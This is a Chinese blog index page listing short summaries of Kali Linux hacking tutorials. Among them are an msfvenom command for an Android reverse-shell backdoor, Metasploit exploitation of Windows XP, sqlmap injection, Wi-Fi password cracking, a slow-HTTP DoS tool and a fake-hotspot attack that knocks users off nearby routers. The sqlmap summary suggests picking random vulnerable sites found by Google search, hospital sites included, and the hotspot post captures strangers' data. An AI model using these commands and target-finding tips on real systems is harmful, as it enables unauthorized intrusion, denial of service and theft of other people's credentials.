摘要: 文本演示怎么使用Kali Linux入侵Android手机。Kali Linux IP地址:192.168.0.112;接收连接的端口:443。同一局域网内android手机一部(android 5.1)创建一个后门程序在终端中执行:# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=443 > my_ba... 阅读全文
posted @ 2017-04-25 17:34 罗道义 阅读(8548) 评论(0) 推荐(1) 编辑
摘要: 我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。本文演示怎么使用Metasploit入侵windows xp sp3。启动msfconsole:# msfconsole选择一个漏洞:msf > search platform: windows xp sp3 exploit/windows/smb... 阅读全文
posted @ 2017-04-25 17:33 罗道义 阅读(18648) 评论(0) 推荐(1) 编辑
摘要: Metasploit可以在Linux、Windows和Mac OS X系统上运行。我假设你已安装了Metasploit,或者你使用的系统是Kali Linux。它有命令行接口也有GUI接口。我使用的系统是Kali Linux,本文以这个系统为例。图形用户界面接口:Armitage命令行接口:msfconsolemsfconsole使用metasploit的基本步骤:运行msfconsole确定远程... 阅读全文
posted @ 2017-04-25 17:21 罗道义 阅读(1215) 评论(0) 推荐(0) 编辑
摘要: Lynis是Linux平台上的一款安全漏洞扫描工具。它可以扫描系统的安全漏洞、收集系统信息、安装的软件信息、配置问题、没有设置密码的用户和防火墙等等。Lynis是流行可靠的安全扫描工具。前不久,Lynis更新了版本,Lynis发布了2.2.0。在这个版本上增加了新的特性和一些小的功能提升。我建议使用Lynis的最新版本2.2.0。下面我在Ubuntu上安装Lynis 2.2.0。安装LynisLy... 阅读全文
posted @ 2017-04-25 17:20 罗道义 阅读(4566) 评论(0) 推荐(0) 编辑
摘要: Metasploit提供了很多辅助的模块,非常实用。今天介绍一个叫search_email_collector的模块,它的功能是查找搜索引擎(google、bing、yahoo),收集和某个域名有关的邮箱地址。使用步骤:启动msfconsole:# service postgresql start# msfconsole搜索模块:msf > search gather auxiliary找到sea... 阅读全文
posted @ 2017-04-25 17:19 罗道义 阅读(1265) 评论(0) 推荐(0) 编辑
摘要: Kali Linux默认并没有安装SSH服务,为了实现远程登录Kali Linux,我们需要安装SSH服务。安装 OpenSSH Server# apt-get install openssh-server配置SSH服务开机启动# update-rc.d -f ssh remove# update-rc.d -f ssh defaults# update-rc.d -f ssh enable 2 ... 阅读全文
posted @ 2017-04-25 11:46 罗道义 阅读(1704) 评论(0) 推荐(0) 编辑
摘要: nmap-Network Mapper,是著名的网络扫描和嗅探工具包。他同样支持Windows和OS X。扫描开放端口和判断操作系统类型先让我们ping一段地址范围,找到启动的主机:# nmap -sP 159.203.205.0-100使用SYN扫描探测操作系统类型:# nmap -sS 159.203.205.61 -O扫描开放端口:# nmap -sV 159.203.205.61 -A扫描... 阅读全文
posted @ 2017-04-25 11:46 罗道义 阅读(9250) 评论(0) 推荐(0) 编辑
摘要: Slowhttptest是一个依赖于实际HTTP协议的Slow HTTP DoS攻击工具,它的设计原理是要求服务器所有请求被完全接收后再进行处理。SlowHTTPTest是一款对服务器进行慢攻击的测试软件,所谓的慢攻击就是相对于cc或者DDoS的快而言的,并不是只有量大速度快才能把服务器搞挂,使用慢攻击有时候也能到达同一效果。slowhttptest包含了之前几种慢攻击的攻击方式,包括slowlo... 阅读全文
posted @ 2017-04-25 09:38 罗道义 阅读(11184) 评论(0) 推荐(1) 编辑
摘要: 我这里使用的Kali Linux,它默认安装了WPScan。在使用WPScan之前,先更新它的漏洞数据库:# wpscan –update扫描wordpress用户wpscan -–url [wordpress网址] –-enumerate u以我的网站为例:# wpscan --url http://blog.topspeedsnail.com --enumerate u注意:要用使用两个–,否... 阅读全文
posted @ 2017-04-25 09:37 罗道义 阅读(4321) 评论(0) 推荐(0) 编辑
摘要: sqlmap是开源的SQL注入自动攻击工具,它可以自动的探测SQL注入点并且进一步控制网站的数据库。Kali Linux默认安装了这个工具。找到潜在的攻击目标第一步是找到有SQL注入漏洞的网站。如果你没有特定攻击目标,可以使用Google搜索 php?id=1 (或php?id= + xx系医院):找到结果中的url:http://www.test.com/index.php?id=1检测是否有S... 阅读全文
posted @ 2017-04-25 09:36 罗道义 阅读(2947) 评论(0) 推荐(0) 编辑
摘要: HTTrack可以克隆指定网站-把整个网站下载到本地。可以用在离线浏览上,也可以用来收集信息(甚至有网站使用隐藏的密码文件)。一些仿真度极高的伪网站(为了骗取用户密码),也是使用类似工具做的。Kali Linux默认安装了HTTrack。HTTrack帮助:# httrack --help使用示例:# httrack http://topspeedsnail.com -O /tmp/topspee... 阅读全文
posted @ 2017-04-25 09:35 罗道义 阅读(759) 评论(0) 推荐(1) 编辑
摘要: RDP是远程桌面协议。$ nmap your_targetStarting Nmap 7.01 ( https://nmap.org ) at 2016-09-20 17:29 CSTNmap scan report for ns514636.ip-192-95-xx.net (192.95.xx.xx)Host is up (0.28s latency).Not shown: 988 close... 阅读全文
posted @ 2017-04-25 09:34 罗道义 阅读(4348) 评论(0) 推荐(0) 编辑
摘要: pdfcrack是破解PDF保护密码的Linux命令行工具。安装pdfcrackDebian系列:# apt install pdfcrack暴力破解# pdfcrack -f filename.pdf -n 6 -m 8 -c 0123456789暴力破解密码是漫长单调的过程。上面使用的参数解释:-n:密码最短多少个字符-m:密码最长多少个字符-c:使用的字符集更多选项,查看帮助:# man p... 阅读全文
posted @ 2017-04-25 09:33 罗道义 阅读(1735) 评论(0) 推荐(0) 编辑
摘要: Hydra是非常高效的网络登录破解工具,它可以对多种服务程序执行暴力破解(SSH、VNC等等)。防止这种攻击其实很容易,方法很多。以SSH为例:Ubuntu:使用Port Knocking隐藏SSH端口在Ubuntu中用Fail2Ban保护SSHCentOS 7安装使用Fail2Ban保护SSHDebian使用Fail2Ban和Tinyhoneypot增加网络安全Kail Linux有一个的GUI... 阅读全文
posted @ 2017-04-25 09:33 罗道义 阅读(795) 评论(0) 推荐(0) 编辑
摘要: 文本仅供学习交流。我使用的系统是macbook pro 15:安装aircrack-ng使用homebrew安装,命令:brew install aircrack-ng抓包-抓取带密码的握手包macbook自带了一个wifi工具:airport。sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Cu... 阅读全文
posted @ 2017-04-25 09:31 罗道义 阅读(13032) 评论(0) 推荐(0) 编辑
摘要: WEP是无线路由器最初广泛使用的一种加密方式,这种加密方式非常容易被破解。目前很少有人使用wep加密方式,但是还是会有。建议:使用WPA/WPA2做为加密方式。抓包和“破解wpa/wpa2”方法一样,参考其中的前4步5) 加快Beacons和Data数据的收集速度和破解WPA/WPA2不同的是,它只要抓取到足够的Beacons和Data数据就可以破解,理想情况下是100000+。你可以等,也可以使... 阅读全文
posted @ 2017-04-25 09:30 罗道义 阅读(2116) 评论(0) 推荐(0) 编辑
摘要: Kali Linux能做很多事,但是它主要以渗透测试及’破解wifi密码’闻名。如果你使用Macbook 请看 使用macbook破解WPA/WPA2 wifi密码要求:安装有Kali Linux的计算机支持监控模式的网卡,笔记本电脑一般都支持字典文件时间和耐心这种攻击需要字典文件,一个好的字典至关重要。我以Kali Linux自带的rockyou字典为例,位于/user/share/wordli... 阅读全文
posted @ 2017-04-25 09:29 罗道义 阅读(43846) 评论(1) 推荐(3) 编辑
摘要: 来自wikipeida:Wi-Fi保护设置(简称WPS,全称Wi-Fi Protected Setup)是一个无线网络安全标准,旨在让家庭用户使用无线网络时简化加密步骤。此标准由Wi-Fi联盟(Wi-Fi Alliance)于2006年制定。在2011年12月28日安全专家Stefan Viehbock报出此标准的一个重大安全漏洞,此漏洞允许远程攻击者使用暴力攻击在几小时内就能获取WPS的PIN码... 阅读全文
posted @ 2017-04-25 09:28 罗道义 阅读(30408) 评论(0) 推荐(0) 编辑
摘要: 全世界,现在大约50%的网站没有使用SSL加密,天朝尤其多。我们都知道通过HTTP发送的数据都是明文,没有使用任何加密,即使是在数据敏感的登录页面。本文的目的是:如果你在不熟悉的网络环境中,要注意提高警惕。没有人希望自己的密码暴露给他人,so,不要嗅探(狗)他人的密码。想象有一个攻击者坐在某个咖啡馆里,桌子上放着他的笔记本电脑并连着咖啡馆的免费wifi。这个家伙就可以非常容易的获得网络里通信信息。... 阅读全文
posted @ 2017-04-25 09:24 罗道义 阅读(8907) 评论(0) 推荐(1) 编辑
摘要: 本帖介绍怎么创建假的wifi热点,然后抓取连接到这个wifi用户的敏感数据。我们还会给周围的无线路由器发送未认证的包,使这些路由器瘫痪,强迫用户连接(或自动连接)我们创建的假wifi热点。这种攻击也叫”水坑攻击”-把其他用户都聚集到一个”坑”中。系统要求:Kali Linux本地有线网络连接(网络接口 eth0)无线网卡支持包注入模式和监控模式 (网络接口 wlan0)各种抓包工具-Wiresha... 阅读全文
posted @ 2017-04-25 09:24 罗道义 阅读(723) 评论(0) 推荐(0) 编辑
本站总访问量